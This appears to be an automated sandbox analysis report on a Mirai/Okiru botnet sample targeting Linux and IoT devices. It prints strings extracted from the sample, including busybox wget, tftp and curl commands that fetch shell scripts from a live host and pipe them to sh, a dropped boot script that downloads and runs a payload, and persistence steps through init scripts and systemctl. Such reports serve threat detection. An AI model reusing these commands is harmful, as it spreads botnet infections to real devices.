Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name: sh4.nn.elf
Analysis ID: 1579433
MD5: e7bb727f1a2a860ab0f144e609d4702b
SHA1: fd5b92a1a1106b3cae7c7b1988b1b0af82aee05a
SHA256: c345a14162edb069955fea2ab19a25a7ca8fe1db490e9972ace7c83e55ccd9f3
Tags: elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: sh4.nn.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: sh4.nn.elf ReversingLabs: Detection: 44%
Source: sh4.nn.elf Virustotal: Detection: 40% Perma Link
Found strings indicative of a multi-platform dropper
Source: sh4.nn.elf String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234Found And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/ /proc-altered/tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginmalloc[start_pid_hopping] Failed to clone: %s
Source: sh4.nn.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 94.156.227.234 ports 38242,199,2,3,4,8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:60018 -> 94.156.227.234:38242
Sample listens on a socket
Source: /tmp/sh4.nn.elf (PID: 6260) Socket: 0.0.0.0:38242 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 36.162.130.212
Source: unknown TCP traffic detected without corresponding DNS query: 221.86.179.58
Source: unknown TCP traffic detected without corresponding DNS query: 36.162.130.212
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 146.95.42.125
Source: unknown TCP traffic detected without corresponding DNS query: 214.47.5.9
Source: unknown TCP traffic detected without corresponding DNS query: 221.86.179.58
Source: unknown TCP traffic detected without corresponding DNS query: 185.72.239.132
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 146.95.42.125
Source: unknown TCP traffic detected without corresponding DNS query: 214.47.5.9
Source: unknown TCP traffic detected without corresponding DNS query: 185.72.239.132
Source: unknown TCP traffic detected without corresponding DNS query: 56.225.147.13
Source: unknown TCP traffic detected without corresponding DNS query: 78.81.159.233
Source: unknown TCP traffic detected without corresponding DNS query: 101.225.11.26
Source: unknown TCP traffic detected without corresponding DNS query: 175.233.178.113
Source: unknown TCP traffic detected without corresponding DNS query: 35.211.175.187
Source: unknown TCP traffic detected without corresponding DNS query: 66.179.137.88
Source: unknown TCP traffic detected without corresponding DNS query: 164.6.251.194
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown TCP traffic detected without corresponding DNS query: 163.238.7.171
Source: unknown TCP traffic detected without corresponding DNS query: 177.51.94.92
Source: unknown TCP traffic detected without corresponding DNS query: 221.77.82.131
Source: unknown TCP traffic detected without corresponding DNS query: 7.189.59.121
Source: unknown TCP traffic detected without corresponding DNS query: 56.225.147.13
Source: unknown TCP traffic detected without corresponding DNS query: 86.30.55.36
Source: unknown TCP traffic detected without corresponding DNS query: 217.31.105.251
Source: unknown TCP traffic detected without corresponding DNS query: 113.90.218.224
Source: unknown TCP traffic detected without corresponding DNS query: 202.173.17.7
Source: unknown TCP traffic detected without corresponding DNS query: 78.81.159.233
Source: unknown TCP traffic detected without corresponding DNS query: 76.124.19.26
Source: unknown TCP traffic detected without corresponding DNS query: 116.150.43.75
Source: unknown TCP traffic detected without corresponding DNS query: 212.158.194.227
Source: unknown TCP traffic detected without corresponding DNS query: 34.106.67.185
Source: unknown TCP traffic detected without corresponding DNS query: 128.55.101.24
Source: unknown TCP traffic detected without corresponding DNS query: 155.177.159.125
Source: unknown TCP traffic detected without corresponding DNS query: 128.20.145.49
Source: unknown TCP traffic detected without corresponding DNS query: 95.230.234.3
Source: unknown TCP traffic detected without corresponding DNS query: 108.152.234.159
Source: unknown TCP traffic detected without corresponding DNS query: 101.225.11.26
Source: unknown TCP traffic detected without corresponding DNS query: 133.52.180.76
Source: unknown TCP traffic detected without corresponding DNS query: 121.48.72.181
Source: unknown TCP traffic detected without corresponding DNS query: 175.233.178.113
Source: unknown TCP traffic detected without corresponding DNS query: 69.41.161.154
Source: unknown TCP traffic detected without corresponding DNS query: 35.211.175.187
Source: unknown TCP traffic detected without corresponding DNS query: 70.15.71.139
Source: unknown TCP traffic detected without corresponding DNS query: 66.179.137.88
Source: unknown TCP traffic detected without corresponding DNS query: 65.219.153.145
Source: sh4.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, sh4.nn.elf.32.dr, custom.service.12.dr String found in binary or memory: http://94.156.227.233/
Source: sh4.nn.elf String found in binary or memory: http://94.156.227.233/curl.sh
Source: sh4.nn.elf String found in binary or memory: http://94.156.227.233/lol.sh
Source: sh4.nn.elf String found in binary or memory: http://94.156.227.233/oro1vk
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234Found And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/ /proc-altered/tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/b
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 788, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 884, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 1664, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 2096, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 2102, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 6299, result: successful Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6354) SIGKILL sent: pid: 6426, result: successful Jump to behavior
Source: classification engine Classification label: mal92.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior
barindex
Sample tries to persist itself using /etc/profile
Source: /tmp/sh4.nn.elf (PID: 6260) File: /etc/profile Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/sh4.nn.elf (PID: 6260) File: /etc/rc.local Jump to behavior
Source: /usr/bin/ln (PID: 6322) File: /etc/rcS.d/S99system -> /etc/init.d/system Jump to behavior
Source: /usr/bin/ln (PID: 6336) File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf Jump to behavior
Sample tries to set files in /etc globally writable
Source: /tmp/sh4.nn.elf (PID: 6260) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6317) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6327) File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6472/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6471/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6430/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6473/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6431/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6456/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6092/cmdline Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6470/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/1477/cmdline Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/799/cmdline Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6425/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6469/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6468/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6426/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6429/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6461/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6460/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6463/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6462/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6465/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6464/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6467/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6466/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6458/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6457/status Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6341) File opened: /proc/6459/status Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/sh4.nn.elf (PID: 6277) Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6310) Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6318) Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6323) Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6325) Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6328) Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6331) Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1" Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 6317) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system Jump to behavior
Source: /bin/sh (PID: 6327) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elf Jump to behavior
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 6330) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /bin/sh (PID: 6284) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service Jump to behavior
Sample tries to set the executable flag
Source: /tmp/sh4.nn.elf (PID: 6260) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6317) File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6327) File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes shell script file to disk with an unusual file extension
Source: /tmp/sh4.nn.elf (PID: 6260) Writes shell script file to disk with an unusual file extension: /etc/init.d/system Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6260) Writes shell script file to disk with an unusual file extension: /etc/rc.local Jump to dropped file
Source: /bin/sh (PID: 6323) Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elf Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/sh4.nn.elf (PID: 6260) File: /etc/init.d/system Jump to dropped file
Source: /bin/sh (PID: 6323) File: /etc/init.d/sh4.nn.elf Jump to dropped file
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/sh4.nn.elf (PID: 6260) Queries kernel information via 'uname': Jump to behavior
Source: sh4.nn.elf, 6260.1.000055f98220e000.000055f982292000.rw-.sdmp Binary or memory string: U1!/usr/bin/vmtoolsd
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: /qemu-open.XXXXX
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
Source: sh4.nn.elf, 6260.1.000055f98220e000.000055f982292000.rw-.sdmp Binary or memory string: /usr/bin/vmtoolsd
Source: sh4.nn.elf, 6260.1.000055f98220e000.000055f982292000.rw-.sdmp Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6260.1.000055f98220e000.000055f982292000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: U/tmp/qemu-open.LF9svx
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: /tmp/qemu-open.LF9svx
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: sh4.nn.elf, 6260.1.00007ffd3ea64000.00007ffd3ea85000.rw-.sdmp Binary or memory string: /qemu-open.XXXXXSXPF

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6260.1.00007f5cf8400000.00007f5cf8417000.r-x.sdmp, type: MEMORY
Yara detected Okiru
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6260.1.00007f5cf8400000.00007f5cf8417000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sh4.nn.elf PID: 6260, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6260.1.00007f5cf8400000.00007f5cf8417000.r-x.sdmp, type: MEMORY
Yara detected Okiru
Source: Yara match File source: sh4.nn.elf, type: SAMPLE
Source: Yara match File source: 6260.1.00007f5cf8400000.00007f5cf8417000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sh4.nn.elf PID: 6260, type: MEMORYSTR

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
136.177.253.115
 unknown United States
22284 AS22284-DOI-OPSUS false
173.5.14.197
 unknown United States
10507 SPCSUS false
194.150.233.243
 unknown Ukraine
34762 COMBELL-ASBE false
212.234.148.47
 unknown France
3215 FranceTelecom-OrangeFR false
211.33.113.230
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
29.194.158.5
 unknown United States
7922 COMCAST-7922US false
65.237.227.59
 unknown United States
701 UUNETUS false
100.252.93.167
 unknown United States
21928 T-MOBILE-AS21928US false
48.52.4.224
 unknown United States
2686 ATGS-MMD-ASUS false
113.198.127.147
 unknown Korea Republic of
55622 CNUE-AS-KRCNUEKR false
155.26.246.10
 unknown United States
1556 DNIC-ASBLK-01550-01601US false
62.211.135.191
 unknown Italy
3269 ASN-IBSNAZIT false
174.42.86.145
 unknown United States
6167 CELLCO-PARTUS false
146.188.103.42
 unknown United Kingdom
702 UUNETUS false
169.190.116.15
 unknown United States
37611 AfrihostZA false
201.75.122.208
 unknown Brazil
28573 CLAROSABR false
161.69.210.48
 unknown United States
7754 MCAFEEUS false
208.193.8.68
 unknown United States
701 UUNETUS false
67.253.209.186
 unknown United States
11351 TWC-11351-NORTHEASTUS false
14.175.57.246
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
60.208.36.80
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
136.45.199.195
 unknown United States
16591 GOOGLE-FIBERUS false
223.92.145.71
 unknown China
56041 CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC false
179.137.87.125
 unknown Brazil
26599 TELEFONICABRASILSABR false
34.45.225.142
 unknown United States
2686 ATGS-MMD-ASUS false
106.111.43.16
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
29.136.86.138
 unknown United States
7922 COMCAST-7922US false
220.63.147.183
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
92.181.179.254
 unknown France
31204 SUNCOMMUNICATIONS-ASJVSunCommunicationsAutonomousSyst false
213.193.245.162
 unknown Netherlands
15703 TRUESERVER-ASTrueServerBVASnumberNL false
146.150.51.102
 unknown United States
15169 GOOGLEUS false
207.85.152.113
 unknown United States
3354 THENET-AS-3354US false
99.175.88.217
 unknown United States
7018 ATT-INTERNET4US false
95.5.137.106
 unknown Turkey
9121 TTNETTR false
27.74.115.166
 unknown Viet Nam
7552 VIETEL-AS-APViettelGroupVN false
25.154.143.40
 unknown United Kingdom
7922 COMCAST-7922US false
175.164.168.151
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
95.102.171.247
 unknown Slovakia (SLOVAK Republic)
6855 SK-TELEKOMSK false
44.18.204.240
 unknown United States
7377 UCSDUS false
36.202.219.225
 unknown China
24138 CTTNETChinaTieTongTelecommunicationsCorporationCN false
150.111.252.48
 unknown United States
32531 FORDHAM-UNIVERSITYUS false
200.72.107.21
 unknown Chile
6471 ENTELCHILESACL false
22.187.21.236
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
203.219.236.81
 unknown Australia
7545 TPG-INTERNET-APTPGTelecomLimitedAU false
42.104.114.80
 unknown India
55410 VIL-AS-APVodafoneIdeaLtdIN false
183.216.166.231
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
102.11.69.63
 unknown unknown
37069 MOBINILEG false
58.118.130.196
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
58.198.40.215
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
5.47.248.138
 unknown Turkey
20978 TT_MOBILIstanbulTR false
103.219.38.247
 unknown China
58461 CT-HANGZHOU-IDCNo288Fu-chunRoadCN false
87.109.14.74
 unknown Saudi Arabia
25019 SAUDINETSTC-ASSA false
99.130.99.24
 unknown United States
7018 ATT-INTERNET4US false
125.47.104.5
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
143.238.53.4
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
143.149.38.158
 unknown United States
385 AFCONC-BLOCK1-ASUS false
147.70.139.247
 unknown United States
19899 MDC-EDUUS false
215.245.84.1
 unknown United States
721 DNIC-ASBLK-00721-00726US false
145.184.234.30
 unknown Netherlands
59524 KPN-IAASNL false
184.166.236.56
 unknown United States
33588 BRESNAN-33588US false
184.216.64.64
 unknown United States
10507 SPCSUS false
213.77.164.108
 unknown Poland
12479 UNI2-ASES false
58.69.247.34
 unknown Philippines
9299 IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH false
78.7.68.246
 unknown Italy
8968 BT-ITALIAIT false
136.132.101.140
 unknown United States
60311 ONEFMCH false
151.86.239.88
 unknown Italy
8217 ASN-ENIIT false
131.141.78.162
 unknown Canada
74 SSC-299-Z-74CA false
122.144.121.32
 unknown Philippines
18396 PHILCOMCORP-MND-AS-APPLDT-PhilComIncPH false
142.28.111.82
 unknown Canada
3633 PROVINCE-OF-BRITISH-COLUMBIACA false
69.43.233.20
 unknown United States
30362 HPT-ASNUS false
3.243.200.233
 unknown United States
14618 AMAZON-AESUS false
72.249.240.252
 unknown United States
30688 FASTTRACK-NET-ASUS false
88.18.240.62
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
143.236.53.244
 unknown United States
3128 BRUWS-AS3128US false
112.222.70.198
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
21.103.141.215
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
68.0.183.116
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
135.25.25.113
 unknown United States
54614 CIKTELECOM-CABLECA false
1.200.90.243
 unknown Taiwan; Republic of China (ROC)
